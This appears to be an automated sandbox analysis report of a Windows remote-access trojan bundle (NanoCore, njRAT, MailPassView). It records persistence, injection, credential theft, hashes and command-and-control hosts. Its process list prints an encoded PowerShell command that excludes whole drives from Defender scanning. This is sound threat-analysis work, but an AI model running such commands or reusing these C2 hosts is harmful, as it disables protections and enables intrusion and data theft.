Analysis Overview
SHA256
f6b10c59c9ce33c5c8f6b02c3293fe5d479e59542698c91b15af74bcce50ab8f
Threat Level: Known bad
The file 80C6039DC12399E3F771632F0A44C4C3.exe was found to be: Known bad.
Malicious Activity Summary
NanoCore
njRAT/Bladabindi
NirSoft MailPassView
Nirsoft
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Reads data files stored by FTP clients
Checks computer location settings
Uses the VBS compiler for execution
Checks whether UAC is enabled
Adds Run key to start application
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-06 18:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-06 18:17
Reported
2024-01-06 18:20
Platform
win7-20231129-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
NanoCore
njRAT/Bladabindi
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sanas.scr | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FreeScript.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Server2223.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | \??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Server.exe" | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\TCP Service = "C:\\Program Files (x86)\\TCP Service\\tcpsv.exe" | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\AppData\\Local\\Temp\\sanas.scr" | C:\Users\Admin\AppData\Local\Temp\sanas.scr | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2852 set thread context of 768 | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | \??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe |
| PID 2852 set thread context of 2936 | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | \??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\TCP Service\tcpsv.exe | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| File opened for modification | C:\Program Files (x86)\TCP Service\tcpsv.exe | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| N/A | N/A | \??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sanas.scr | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sanas.scr | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sanas.scr | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe
"C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe"
C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe
"C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AcAB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZQBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAeQBqACMAPgA="
C:\Users\Admin\AppData\Local\Temp\FreeScript.exe
"C:\Users\Admin\AppData\Local\Temp\FreeScript.exe"
C:\Users\Admin\AppData\Local\Temp\Server2223.exe
"C:\Users\Admin\AppData\Local\Temp\Server2223.exe"
C:\Users\Admin\AppData\Local\Temp\Server.exe
"C:\Users\Admin\AppData\Local\Temp\Server.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGoAcQB3ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAaQBmACAAZQByAHIAbwByAHMAIABjAG8AbgB0AGEAYwB0ACAAbQBlACAAbQBhAGkAawBrAGkANAAyADAAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHMAbABwACMAPgA="
C:\Users\Admin\AppData\Local\Temp\sanas.scr
"C:\Users\Admin\AppData\Local\Temp\sanas.scr" /S
C:\Users\Admin\AppData\Local\Temp\microsofts.exe
"C:\Users\Admin\AppData\Local\Temp\microsofts.exe"
\??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
"c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\Admin\AppData\Local\Temp\0bvuh0yt.zfe"
\??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
"c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\Admin\AppData\Local\Temp\qad1ehsl.ym4"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | links-transition.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | plan-holder.at.ply.gg | udp |
| US | 8.8.8.8:53 | fall-sustained.gl.at.ply.gg | udp |
| US | 147.185.221.17:41958 | fall-sustained.gl.at.ply.gg | tcp |
| US | 147.185.221.17:41937 | fall-sustained.gl.at.ply.gg | tcp |
| US | 209.25.141.211:44833 | plan-holder.at.ply.gg | tcp |
| US | 209.25.141.211:44833 | plan-holder.at.ply.gg | tcp |
| US | 209.25.141.211:44833 | plan-holder.at.ply.gg | tcp |
| US | 209.25.141.211:44833 | plan-holder.at.ply.gg | tcp |
| US | 209.25.141.211:44833 | plan-holder.at.ply.gg | tcp |
| US | 209.25.141.211:44833 | plan-holder.at.ply.gg | tcp |
| US | 209.25.141.211:44833 | plan-holder.at.ply.gg | tcp |
Files
\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe
| MD5 | 5f2ee29ef8f1d3ce52051b89eb690636 |
| SHA1 | 06ac76ef4070e0f0144f151f0ed927042789258a |
| SHA256 | bd2faaed9c8559f55ee3bfce7658b27dc21cfc5606c665561401dc5fdad7c14b |
| SHA512 | bcc2b3e8e2032c58daa2ed554888b97c34cc60e085f713cce5f5593aec0f7ad4213cd684e3e1e1ff06ac8466342f6e2c9a9133531d2579649a06f397d26b3800 |
C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe
| MD5 | cff6bd15ff11608502d43c19584783a7 |
| SHA1 | 740c5153ee4e4799d75758007195c6bf0c5d4a40 |
| SHA256 | 0cb43babac1cc190cd461163307ea306f8cf14688889ce6aaa77b1c7548b85bd |
| SHA512 | c75fc0bb4abed4fe6dbe74e74dbdc9bf311996aaf7a8dc7870e573d6d6be33d7ce0cc5130160f2099fd6f15c1389c48f909322e5a1fda385dcc8a260c9858e8d |
memory/3032-50-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/3032-51-0x0000000000AE0000-0x0000000000B60000-memory.dmp
memory/3032-52-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/2852-53-0x00000000004A0000-0x00000000004E0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Server2223.exe
| MD5 | 86757f6c08b6cb698250cc9fc1816a8e |
| SHA1 | fa8a2fbc982943a031ad202b3e4b1cdb11bcff6a |
| SHA256 | 98fa9c5139362be3e25333a7c48229ed220cc61c0dc41b8270e66d2886aa7dff |
| SHA512 | cb87cf73deda4299561af9e7c4d65a82816ca5f82890edd76cfec258dbf973b197cd6c40bca2f8643d39f451072e71c5f9529864689cc68097a4382bec97a7dc |
C:\Users\Admin\AppData\Local\Temp\Server.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2852-57-0x00000000737C0000-0x0000000073D6B000-memory.dmp
memory/2632-58-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/2632-59-0x0000000000930000-0x00000000009B0000-memory.dmp
memory/2740-60-0x00000000737C0000-0x0000000073D6B000-memory.dmp
memory/2740-61-0x0000000002130000-0x0000000002170000-memory.dmp
memory/320-63-0x0000000002E80000-0x0000000002EC0000-memory.dmp
memory/320-62-0x00000000737C0000-0x0000000073D6B000-memory.dmp
memory/3012-64-0x00000000737C0000-0x0000000073D6B000-memory.dmp
memory/2852-66-0x00000000737C0000-0x0000000073D6B000-memory.dmp
memory/320-65-0x0000000002E80000-0x0000000002EC0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\FreeScript.exe
| MD5 | 799c188cf6df366f4c0f98b8800a4977 |
| SHA1 | 161d6006518879ecba6cf45b29599992d8eadfce |
| SHA256 | 32e96ac5e9d2f869ad11ca48401ca8eaeb520027751427145ddb5ab43bce1841 |
| SHA512 | 32a3749f4ef40e9345644c84666207a7c4f0369274cc18f71eecd1eeb6ea22733bc4cc6751f7281bbdff7e0a2187209a6c00653a95d6d39adb4dab06f355e1b1 |
memory/3012-67-0x00000000737C0000-0x0000000073D6B000-memory.dmp
memory/3032-69-0x0000000000AE0000-0x0000000000B60000-memory.dmp
memory/2632-68-0x0000000000930000-0x00000000009B0000-memory.dmp
memory/2740-76-0x00000000737C0000-0x0000000073D6B000-memory.dmp
memory/2632-80-0x0000000000930000-0x00000000009B0000-memory.dmp
memory/3032-79-0x0000000000AE0000-0x0000000000B60000-memory.dmp
memory/2632-78-0x0000000000930000-0x00000000009B0000-memory.dmp
memory/3032-77-0x0000000000AE0000-0x0000000000B60000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\microsofts.exe
| MD5 | 5fdd418baf9c0d789e67758ad9f2dd1a |
| SHA1 | c0be3be193af670cfe01a64aef7c5b0a0b9d091a |
| SHA256 | 82f59d1a1a65c0651ae7a965bb6481ba1351ea9efc9f9457de372043709e5a47 |
| SHA512 | 9ace7aed4e4db6f2df7a8df22227079acf176cb7b7e90a0d2638dfd44296653fae6194531a7335fb10fd9396f3cd4f11621715b2a2e4f948209055a809b00c50 |
\Users\Admin\AppData\Local\Temp\sanas.scr
| MD5 | b7cedaa564e3fb095f94aef59f7ed0da |
| SHA1 | 3f93a84f2d290840cfb5418e15c47dda39ab967d |
| SHA256 | 526a5aae8d6af5d4af48bef2bf37f6a79b1584b7b48d32bef6a2f6f4ee69ccfc |
| SHA512 | 18d274dba047179d7cc6b2bb14ede76618bf5c93d8a4b4d1a32bbcf2f6494c9ecc4a601a5a4eae5d7672967be5c3a0c5bfc402f97626638ba7825d6412538f7d |
memory/3032-84-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/2852-87-0x00000000737C0000-0x0000000073D6B000-memory.dmp
memory/2852-86-0x00000000004A0000-0x00000000004E0000-memory.dmp
memory/2632-89-0x0000000000930000-0x00000000009B0000-memory.dmp
memory/320-90-0x00000000737C0000-0x0000000073D6B000-memory.dmp
memory/320-91-0x0000000002E80000-0x0000000002EC0000-memory.dmp
memory/2632-88-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/3032-85-0x0000000000AE0000-0x0000000000B60000-memory.dmp
memory/2852-92-0x00000000737C0000-0x0000000073D6B000-memory.dmp
memory/2632-94-0x0000000000930000-0x00000000009B0000-memory.dmp
memory/768-112-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3032-111-0x0000000000AE0000-0x0000000000B60000-memory.dmp
memory/2632-110-0x0000000000930000-0x00000000009B0000-memory.dmp
memory/3032-109-0x0000000000AE0000-0x0000000000B60000-memory.dmp
memory/768-108-0x0000000000400000-0x000000000041B000-memory.dmp
memory/768-106-0x0000000000400000-0x000000000041B000-memory.dmp
memory/768-104-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/768-102-0x0000000000400000-0x000000000041B000-memory.dmp
memory/768-100-0x0000000000400000-0x000000000041B000-memory.dmp
memory/768-99-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3032-96-0x0000000000AE0000-0x0000000000B60000-memory.dmp
memory/768-97-0x0000000000400000-0x000000000041B000-memory.dmp
memory/768-93-0x0000000000400000-0x000000000041B000-memory.dmp
memory/2632-113-0x0000000000930000-0x00000000009B0000-memory.dmp
memory/320-114-0x00000000737C0000-0x0000000073D6B000-memory.dmp
memory/768-117-0x0000000000400000-0x000000000041B000-memory.dmp
memory/2936-127-0x0000000000400000-0x0000000000453000-memory.dmp
memory/2936-134-0x0000000000400000-0x0000000000453000-memory.dmp
memory/2936-133-0x0000000000400000-0x0000000000453000-memory.dmp
memory/2936-131-0x0000000000400000-0x0000000000453000-memory.dmp
memory/2936-125-0x0000000000400000-0x0000000000453000-memory.dmp
memory/2936-140-0x0000000000400000-0x0000000000453000-memory.dmp
memory/2936-123-0x0000000000400000-0x0000000000453000-memory.dmp
memory/2936-121-0x0000000000400000-0x0000000000453000-memory.dmp
memory/2936-119-0x0000000000400000-0x0000000000453000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\0bvuh0yt.zfe
| MD5 | 69b2a2e17e78d24abee9f1de2f04811a |
| SHA1 | d19c109704e83876ab3527457f9418a7d053aa33 |
| SHA256 | 1b1491f21e64681f8fdc27b2265e2274fb7813eecb6ad8b446d2e431f6300edd |
| SHA512 | eb7269979bc4187520636fe3d7b3089f2c7c02e81c4ce2a738ade680f72c61c67fe9577eeaa09d3ca93f34b60be8c434d2cfbfed6566e783f6611279f056150f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-06 18:17
Reported
2024-01-06 18:20
Platform
win10v2004-20231215-en
Max time kernel
155s
Max time network
166s
Command Line
Signatures
NanoCore
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sanas.scr | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sanas.scr | N/A |
| N/A | N/A | C:\Windows\System32\wuapihost.exe | N/A |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Server2223.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | \??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ARP Manager = "C:\\Program Files (x86)\\ARP Manager\\arpmgr.exe" | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Server.exe" | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\AppData\\Local\\Temp\\sanas.scr" | C:\Users\Admin\AppData\Local\Temp\sanas.scr | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\AppData\\Roaming\\VanToM Folder\\Server.exe" | C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1588 set thread context of 2308 | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | \??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe |
| PID 1588 set thread context of 844 | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | \??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\ARP Manager\arpmgr.exe | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| File created | C:\Program Files (x86)\ARP Manager\arpmgr.exe | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sanas.scr | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\microsofts.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sanas.scr | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sanas.scr | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe
"C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe"
C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe
"C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe"
C:\Users\Admin\AppData\Local\Temp\microsofts.exe
"C:\Users\Admin\AppData\Local\Temp\microsofts.exe"
C:\Users\Admin\AppData\Local\Temp\sanas.scr
"C:\Users\Admin\AppData\Local\Temp\sanas.scr" /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGoAcQB3ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAaQBmACAAZQByAHIAbwByAHMAIABjAG8AbgB0AGEAYwB0ACAAbQBlACAAbQBhAGkAawBrAGkANAAyADAAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHMAbABwACMAPgA="
C:\Users\Admin\AppData\Local\Temp\Server.exe
"C:\Users\Admin\AppData\Local\Temp\Server.exe"
C:\Users\Admin\AppData\Local\Temp\FreeScript.exe
"C:\Users\Admin\AppData\Local\Temp\FreeScript.exe"
C:\Users\Admin\AppData\Local\Temp\Server2223.exe
"C:\Users\Admin\AppData\Local\Temp\Server2223.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AcAB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZQBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAeQBqACMAPgA="
C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe
"C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"
C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe
"C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\wuapihost.exe
C:\Windows\System32\wuapihost.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
\??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
"c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\Admin\AppData\Local\Temp\fltbew5y.yr1"
\??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
"c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\Admin\AppData\Local\Temp\ytmrj20j.erj"
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
